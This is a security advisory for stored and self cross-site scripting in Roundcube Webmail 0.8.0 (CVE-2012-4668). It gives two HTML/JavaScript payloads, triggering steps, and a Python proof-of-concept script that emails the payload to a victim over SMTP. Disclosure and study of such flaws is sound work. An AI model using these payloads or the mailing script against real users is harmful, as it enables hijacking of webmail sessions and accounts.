|
|
| |
| Roundcube Webmail Version 0.8.0 suffers from stored XSS vulnerability |
| |
Credit:
The information has been provided by dun.
|
| |
Vulnerable Systems:
* Roundcube Webmail Version 0.8.0
1. Stored XSS in e-mail body.
XSS Payload: <a href=javascript:alert("XSS")>POC MAIL</a>
Send an email to the victim with the payload in the email body, Once the user clicks on the url the XSS should be triggered.
2. Self XSS in e-mail body (Signature).
XSS Payload: "><img src='1.jpg'onerror=javascript:alert("XSS")>
In order to trigger this XSS you should insert the payload into your signature.
Settings -> Identities -> Your Identitiy -> Signature
Now create a new mail, XSS Should be triggered.
'''
import smtplib
print "###############################################"
print "# Roundcube 0.8.0 Stored XSS POC #"
print "# Coded by: Shai rod #"
print "# @NightRang3r #"
print "# http://exploit.co.il #"
print "# For Educational Purposes Only! #"
print "###############################################\r\n"
# SETTINGS
sender = "attacker@localhost"
smtp_login = sender
smtp_password = "qwe123"
recipient = "victim@localhost"
smtp_server = "192.168.1.10"
smtp_port = 25
subject = "Roundcube Webmail XSS POC"
# SEND E-MAIL
print "[*] Sending E-mail to " + recipient + "..."
msg = ("From: %s\r\nTo: %s\r\nSubject: %s\n"
% (sender, ", ".join(recipient), subject) )
msg += "Content-type: text/html\n\n"
msg += """<a href=javascript:alert("XSS")>Click Me, Please...</a>\r\n"""
server = smtplib.SMTP(smtp_server, smtp_port)
server.ehlo()
server.starttls()
server.login(smtp_login, smtp_password)
server.sendmail(sender, recipient, msg)
server.quit()
print "[+] E-mail sent!"
CVE Information:
2012-4668
Disclosure Timeline:
Published: 2012-08-17
|
|
blog comments powered by
|
|
